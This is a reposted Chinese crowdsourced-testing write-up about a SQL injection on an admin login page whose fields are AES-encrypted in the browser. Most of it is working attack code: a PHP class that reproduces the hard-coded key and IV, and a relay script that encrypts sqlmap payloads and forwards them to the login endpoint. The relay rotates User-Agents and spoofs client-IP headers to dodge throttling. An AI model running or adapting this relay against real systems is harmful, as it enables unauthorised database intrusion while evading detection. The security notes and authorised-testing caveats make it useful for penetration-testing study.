【转】众测厂商某站点绕过前端加密进行注入
0x01 概要
站点:http://aa.test.com:8088/Admin/Login,这样看起来是一个挺正常的界面,测试一下发现存在注入
很清楚地可以看到两张截图(原文配图,本页未收录)中的响应有明显区别,说明存在注入。
抓包时发现用户名和密码在前端做了加密。
0x02 查看前端加密方式
前端加密的话,只需要找到对应的前端加密脚本即可:密钥和 IV 都硬编码在发给浏览器的 JS 里,任何人都能读到。这种"加密"只是混淆,对攻击者没有任何防护作用——它既不能替代服务端的参数化查询,也不能替代 TLS。
0x03 编码对应解密脚本
# AES加解密脚本:
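<?php
declare(strict_types=1);

/**
 * AES/CBC/PKCS5Padding helper that reproduces the target's front-end encryption.
 *
 * The browser encrypts the login fields with a fixed key and IV before POSTing
 * them; this class does the same thing server-side so an injection payload can
 * be encrypted exactly as the browser would.  It was ported from ext/mcrypt
 * (deprecated in PHP 7.1, removed in 7.2) to ext/openssl, and the removed
 * `$str{$i}` string-offset syntax was replaced.  The wire format (raw CBC
 * output rendered as lower-case hex) is unchanged, so the output still matches
 * what the browser sends.  Requires PHP 7.1+ with ext/openssl.
 *
 * Security note: a key and IV hard-coded in client-side JavaScript are visible
 * to every user of the page, so this is obfuscation, not encryption.  It gives
 * no confidentiality or integrity against an attacker and must not be mistaken
 * for input validation or for TLS.  Never reuse this class in production.
 */
class Crypt
{
    /** AES block size in bytes; also the required IV length and the PKCS#5 block. */
    private const BLOCK_SIZE = 16;

    /**
     * Cipher / mode labels.  Retained only so setCipher()/setMode() keep
     * working; encrypt()/decrypt() always use AES-CBC, exactly as the original
     * hard-coded RIJNDAEL_128 + CBC regardless of these setters.
     * @var string
     */
    private $cipher = 'aes';
    /** @var string */
    private $mode = 'cbc';

    /**
     * Encryption key.  32 bytes selects AES-256 (mcrypt's RIJNDAEL_128 with a
     * 32-byte key was AES-256); 16 and 24 bytes select AES-128 / AES-192.
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Static initialisation vector, exactly one block long.
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /** Records a cipher label; has no effect on the algorithm (see class doc). */
    public function setCipher(string $cipher = ''): void
    {
        if ($cipher !== '') {
            $this->cipher = $cipher;
        }
    }

    /** Records a mode label; has no effect on the algorithm (see class doc). */
    public function setMode(string $mode = ''): void
    {
        if ($mode !== '') {
            $this->mode = $mode;
        }
    }

    /** Replaces the key.  Must be 16, 24 or 32 bytes; checked on first use. */
    public function setSecretKey(string $secret_key = ''): void
    {
        if ($secret_key !== '') {
            $this->secret_key = $secret_key;
        }
    }

    /** Replaces the IV.  Must be exactly 16 bytes; checked on first use. */
    public function setIv(string $iv = ''): void
    {
        if ($iv !== '') {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypts $str with AES-CBC and returns the ciphertext as lower-case hex.
     *
     * @param string $str Plaintext of any length; PKCS#5 padding is added.
     * @return string Hex ciphertext, always a multiple of 32 hex characters.
     * @throws InvalidArgumentException if the key or IV length is invalid.
     * @throws RuntimeException if OpenSSL reports a failure.
     */
    public function encrypt(string $str): string
    {
        $padded = $this->pkcs5Pad($str, self::BLOCK_SIZE);
        // OPENSSL_ZERO_PADDING disables OpenSSL's own PKCS#7 padding; the
        // padding is applied above so the byte layout matches the mcrypt code.
        $raw = openssl_encrypt(
            $padded,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($raw === false) {
            throw new RuntimeException('AES encryption failed: ' . $this->lastOpensslError());
        }
        // bin2hex() already yields lower-case digits, matching the browser.
        return bin2hex($raw);
    }

    /**
     * Decrypts hex ciphertext produced by encrypt() (or by the browser).
     *
     * @param string $str Hex ciphertext in either case.
     * @return string|false Plaintext, or false when the input is not valid hex,
     *                      not block-aligned, or carries bad PKCS#5 padding.
     * @throws InvalidArgumentException if the key or IV length is invalid.
     */
    public function decrypt(string $str)
    {
        $raw = $this->hex2bin($str);
        if ($raw === false || strlen($raw) % self::BLOCK_SIZE !== 0) {
            return false;
        }
        $padded = openssl_decrypt(
            $raw,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($padded === false) {
            return false;
        }
        return $this->pkcs5Unpad($padded);
    }

    /**
     * Maps the key length to the OpenSSL cipher name, mirroring mcrypt's
     * RIJNDAEL_128 behaviour (128-bit block, key length picks AES-128/192/256).
     * Also validates the IV, which OpenSSL would otherwise pad or truncate with
     * only a warning.
     */
    private function opensslCipher(): string
    {
        if (strlen($this->iv) !== self::BLOCK_SIZE) {
            throw new InvalidArgumentException(sprintf(
                'IV must be %d bytes, got %d',
                self::BLOCK_SIZE,
                strlen($this->iv)
            ));
        }
        switch (strlen($this->secret_key)) {
            case 16:
                return 'aes-128-cbc';
            case 24:
                return 'aes-192-cbc';
            case 32:
                return 'aes-256-cbc';
            default:
                throw new InvalidArgumentException(
                    'AES key must be 16, 24 or 32 bytes, got ' . strlen($this->secret_key)
                );
        }
    }

    /** Drains the OpenSSL error queue into one readable string. */
    private function lastOpensslError(): string
    {
        $messages = [];
        while (($msg = openssl_error_string()) !== false) {
            $messages[] = $msg;
        }
        return $messages === [] ? 'unknown error' : implode('; ', $messages);
    }

    /**
     * Strict hex -> binary.  The original byte loop silently accepted odd
     * lengths and non-hex characters; this returns false for anything that is
     * not a non-empty, even-length hex string.
     *
     * @return string|false
     */
    private function hex2bin(string $hexData)
    {
        if (preg_match('/^(?:[0-9a-fA-F]{2})+$/', $hexData) !== 1) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /** Appends PKCS#5 padding: N bytes of value N, with 1 <= N <= $blocksize. */
    private function pkcs5Pad(string $text, int $blocksize): string
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strips PKCS#5 padding, returning false on anything malformed: empty
     * input, a pad byte outside 1..BLOCK_SIZE, or pad bytes that do not all
     * match.  The original accepted a pad byte of 0 or larger than the block,
     * neither of which is valid PKCS#5.
     *
     * @return string|false
     */
    private function pkcs5Unpad(string $text)
    {
        $len = strlen($text);
        if ($len === 0) {
            return false;
        }
        $pad = ord($text[$len - 1]);
        if ($pad < 1 || $pad > self::BLOCK_SIZE || $pad > $len) {
            return false;
        }
        if (substr($text, $len - $pad) !== str_repeat(chr($pad), $pad)) {
            return false;
        }
        return substr($text, 0, $len - $pad);
    }
}

// Sanity check: compare this output with the ciphertext the browser sends for
// the same input ("111") to confirm key, IV and mode have been reproduced.
echo (new Crypt())->encrypt('111');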
可以看到 PHP 脚本的输出与浏览器抓包得到的密文一致,说明密钥、IV 和加密模式已被完整复现,接下来就可以把它当作代理正常注入了。
# 注入脚本:
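<?php
declare(strict_types=1);

/**
 * AES/CBC/PKCS5Padding helper that reproduces the target's front-end encryption.
 *
 * The browser encrypts the login fields with a fixed key and IV before POSTing
 * them; this class does the same thing server-side so an injection payload can
 * be encrypted exactly as the browser would.  It was ported from ext/mcrypt
 * (deprecated in PHP 7.1, removed in 7.2) to ext/openssl, and the removed
 * `$str{$i}` string-offset syntax was replaced.  The wire format (raw CBC
 * output rendered as lower-case hex) is unchanged, so the output still matches
 * what the browser sends.  Requires PHP 7.1+ with ext/openssl and ext/curl.
 *
 * Security note: a key and IV hard-coded in client-side JavaScript are visible
 * to every user of the page, so this is obfuscation, not encryption.  It gives
 * no confidentiality or integrity against an attacker and must not be mistaken
 * for input validation or for TLS.  Never reuse this class in production.
 */
class Crypt
{
    /** AES block size in bytes; also the required IV length and the PKCS#5 block. */
    private const BLOCK_SIZE = 16;

    /**
     * Cipher / mode labels.  Retained only so setCipher()/setMode() keep
     * working; encrypt()/decrypt() always use AES-CBC, exactly as the original
     * hard-coded RIJNDAEL_128 + CBC regardless of these setters.
     * @var string
     */
    private $cipher = 'aes';
    /** @var string */
    private $mode = 'cbc';

    /**
     * Encryption key.  32 bytes selects AES-256 (mcrypt's RIJNDAEL_128 with a
     * 32-byte key was AES-256); 16 and 24 bytes select AES-128 / AES-192.
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Static initialisation vector, exactly one block long.
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /** Records a cipher label; has no effect on the algorithm (see class doc). */
    public function setCipher(string $cipher = ''): void
    {
        if ($cipher !== '') {
            $this->cipher = $cipher;
        }
    }

    /** Records a mode label; has no effect on the algorithm (see class doc). */
    public function setMode(string $mode = ''): void
    {
        if ($mode !== '') {
            $this->mode = $mode;
        }
    }

    /** Replaces the key.  Must be 16, 24 or 32 bytes; checked on first use. */
    public function setSecretKey(string $secret_key = ''): void
    {
        if ($secret_key !== '') {
            $this->secret_key = $secret_key;
        }
    }

    /** Replaces the IV.  Must be exactly 16 bytes; checked on first use. */
    public function setIv(string $iv = ''): void
    {
        if ($iv !== '') {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypts $str with AES-CBC and returns the ciphertext as lower-case hex.
     *
     * @param string $str Plaintext of any length; PKCS#5 padding is added.
     * @return string Hex ciphertext, always a multiple of 32 hex characters.
     * @throws InvalidArgumentException if the key or IV length is invalid.
     * @throws RuntimeException if OpenSSL reports a failure.
     */
    public function encrypt(string $str): string
    {
        $padded = $this->pkcs5Pad($str, self::BLOCK_SIZE);
        // OPENSSL_ZERO_PADDING disables OpenSSL's own PKCS#7 padding; the
        // padding is applied above so the byte layout matches the mcrypt code.
        $raw = openssl_encrypt(
            $padded,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($raw === false) {
            throw new RuntimeException('AES encryption failed: ' . $this->lastOpensslError());
        }
        // bin2hex() already yields lower-case digits, matching the browser.
        return bin2hex($raw);
    }

    /**
     * Decrypts hex ciphertext produced by encrypt() (or by the browser).
     *
     * @param string $str Hex ciphertext in either case.
     * @return string|false Plaintext, or false when the input is not valid hex,
     *                      not block-aligned, or carries bad PKCS#5 padding.
     * @throws InvalidArgumentException if the key or IV length is invalid.
     */
    public function decrypt(string $str)
    {
        $raw = $this->hex2bin($str);
        if ($raw === false || strlen($raw) % self::BLOCK_SIZE !== 0) {
            return false;
        }
        $padded = openssl_decrypt(
            $raw,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($padded === false) {
            return false;
        }
        return $this->pkcs5Unpad($padded);
    }

    /**
     * Maps the key length to the OpenSSL cipher name, mirroring mcrypt's
     * RIJNDAEL_128 behaviour (128-bit block, key length picks AES-128/192/256).
     * Also validates the IV, which OpenSSL would otherwise pad or truncate with
     * only a warning.
     */
    private function opensslCipher(): string
    {
        if (strlen($this->iv) !== self::BLOCK_SIZE) {
            throw new InvalidArgumentException(sprintf(
                'IV must be %d bytes, got %d',
                self::BLOCK_SIZE,
                strlen($this->iv)
            ));
        }
        switch (strlen($this->secret_key)) {
            case 16:
                return 'aes-128-cbc';
            case 24:
                return 'aes-192-cbc';
            case 32:
                return 'aes-256-cbc';
            default:
                throw new InvalidArgumentException(
                    'AES key must be 16, 24 or 32 bytes, got ' . strlen($this->secret_key)
                );
        }
    }

    /** Drains the OpenSSL error queue into one readable string. */
    private function lastOpensslError(): string
    {
        $messages = [];
        while (($msg = openssl_error_string()) !== false) {
            $messages[] = $msg;
        }
        return $messages === [] ? 'unknown error' : implode('; ', $messages);
    }

    /**
     * Strict hex -> binary.  The original byte loop silently accepted odd
     * lengths and non-hex characters; this returns false for anything that is
     * not a non-empty, even-length hex string.
     *
     * @return string|false
     */
    private function hex2bin(string $hexData)
    {
        if (preg_match('/^(?:[0-9a-fA-F]{2})+$/', $hexData) !== 1) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /** Appends PKCS#5 padding: N bytes of value N, with 1 <= N <= $blocksize. */
    private function pkcs5Pad(string $text, int $blocksize): string
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strips PKCS#5 padding, returning false on anything malformed: empty
     * input, a pad byte outside 1..BLOCK_SIZE, or pad bytes that do not all
     * match.  The original accepted a pad byte of 0 or larger than the block,
     * neither of which is valid PKCS#5.
     *
     * @return string|false
     */
    private function pkcs5Unpad(string $text)
    {
        $len = strlen($text);
        if ($len === 0) {
            return false;
        }
        $pad = ord($text[$len - 1]);
        if ($pad < 1 || $pad > self::BLOCK_SIZE || $pad > $len) {
            return false;
        }
        if (substr($text, $len - $pad) !== str_repeat(chr($pad), $pad)) {
            return false;
        }
        return substr($text, 0, $len - $pad);
    }
}

/**
 * Minimal cURL wrapper used as a relay between sqlmap and the target: it POSTs
 * the already-encrypted form fields and returns the raw response body.
 *
 * Every request carries a random User-Agent and a set of spoofed client-IP
 * headers.  The write-up does not say why; presumably to dodge per-IP / per-UA
 * throttling or lock-out on the login endpoint during the scan.
 */
class SqlCurl
{
    /** Fixed pool of desktop and mobile User-Agent strings, picked at random per request. */
    private const USER_AGENTS = [
        // Desktop user agents
        "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
        "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
        "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
        "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
        // The original string was missing the closing parenthesis, which made
        // it the only malformed UA in the pool - an easy fingerprint.
        "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
        "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
        "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
        "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
        "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
        "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
        "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
        "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
        "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
        "傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
        "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
        "世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        "世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
        "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
        "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
        "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
        "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
        // Mobile user agents
        "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
        "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
        "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
        "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
        "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
        "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
        "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
        "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
        "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
        "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
        "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
        "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
        "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
    ];

    /**
     * Sends one request and returns the response body.
     *
     * @param string $url      Absolute URL to request.
     * @param array  $post     Form fields; when non-empty the request is a POST
     *                         with an application/x-www-form-urlencoded body.
     * @param string $cookie   Raw Cookie header value, or '' for none.
     * @param string $referurl Referer to send; '' means https://www.baidu.com.
     * @return string Response body, or - preserving the original contract -
     *                the cURL error message when the transfer fails.  Callers
     *                that must tell the two apart should check curl's error
     *                wording or switch this to throwing.
     */
    public function curlRequest(string $url, array $post = [], string $cookie = '', string $referurl = ''): string
    {
        if ($referurl === '') {
            $referurl = 'https://www.baidu.com';
        }

        // One spoofed address shared by every IP header.  The original drew a
        // fresh random IP per header, so the five headers contradicted each
        // other - trivial for a WAF or a log reviewer to spot.
        $ip = $this->getIp();
        $header = [
            'CLIENT-IP: ' . $ip,
            'X-FORWARDED-FOR: ' . $ip,
            'HTTP_CLIENT_IP: ' . $ip,
            // The original omitted the ':' here and emitted a malformed header line.
            'HTTP_X_FORWARDED_FOR: ' . $ip,
            'REMOTE_ADDR: ' . $ip,
            'Content-Type: application/x-www-form-urlencoded',
            'X-Requested-With: XMLHttpRequest',
        ];

        $curl = curl_init();
        curl_setopt_array($curl, [
            CURLOPT_URL            => $url,
            CURLOPT_USERAGENT      => $this->agentArry(),
            // NOTE: on a 301/302 cURL re-issues the request as GET and drops
            // the POST body (see CURLOPT_POSTREDIR), so a login endpoint that
            // redirects is not re-POSTed; the redirect target's body is returned.
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_AUTOREFERER    => true,
            CURLOPT_REFERER        => $referurl,
            CURLOPT_HTTPHEADER     => $header,
            CURLOPT_TIMEOUT        => 10,
            CURLOPT_RETURNTRANSFER => true,
        ]);
        if ($post !== []) {
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        }
        if ($cookie !== '') {
            curl_setopt($curl, CURLOPT_COOKIE, $cookie);
        }

        $body = curl_exec($curl);
        // Capture the error before closing: the original returned from inside
        // the error branch without ever calling curl_close(), leaking the handle.
        $error = curl_errno($curl) !== 0 ? curl_error($curl) : '';
        curl_close($curl);
        if ($error !== '') {
            return $error;
        }
        return is_string($body) ? $body : '';
    }

    /**
     * Builds a random dotted-quad for the spoofed client-IP headers.  Octet
     * ranges are kept as in the original (first octet 11-191, others <= 240).
     * mt_rand() is fine here: the value is decoration, not a secret.
     */
    private function getIp(): string
    {
        return sprintf('%d.%d.%d.%d', mt_rand(11, 191), mt_rand(0, 240), mt_rand(1, 240), mt_rand(1, 240));
    }

    /** Picks one User-Agent string at random from the fixed pool. */
    private function agentArry(): string
    {
        return self::USER_AGENTS[array_rand(self::USER_AGENTS)];
    }
}

// Login page the target form lives on:
//   http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#
//
// Relay entry point.  sqlmap is pointed at this script's URL with GET
// parameters UserName and Password; each plaintext payload is encrypted the
// way the browser would and forwarded to the real login submit endpoint, and
// the target's response is echoed back unchanged so sqlmap can diff it.
//
// Security: this is an unauthenticated relay that will forward anything it is
// given to the hard-coded target with spoofed headers.  Bind it to localhost
// (or a firewalled host) and run it only for the duration of an authorised test.
$userName = $_GET['UserName'] ?? '';
$password = $_GET['Password'] ?? '';
if (!is_string($userName) || !is_string($password)) {
    // ?UserName[]=x would reach encrypt() as an array; reject it explicitly
    // rather than emitting "Array" or a TypeError.
    http_response_code(400);
    exit('UserName and Password must be plain strings');
}

$crypt = new Crypt();
$data = [
    'UserName' => $crypt->encrypt($userName),
    'Password' => $crypt->encrypt($password),
];
echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);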
0x04 Sqlmap 正常注入:把上面的脚本部署在本地,让 sqlmap 以 GET 参数 UserName / Password 请求该脚本,脚本会把明文 payload 按前端同样的方式加密后转发到目标登录接口,并把响应原样返回给 sqlmap。注意该脚本本身是一个无鉴权的转发器,只应绑定在本机、仅在授权测试期间运行。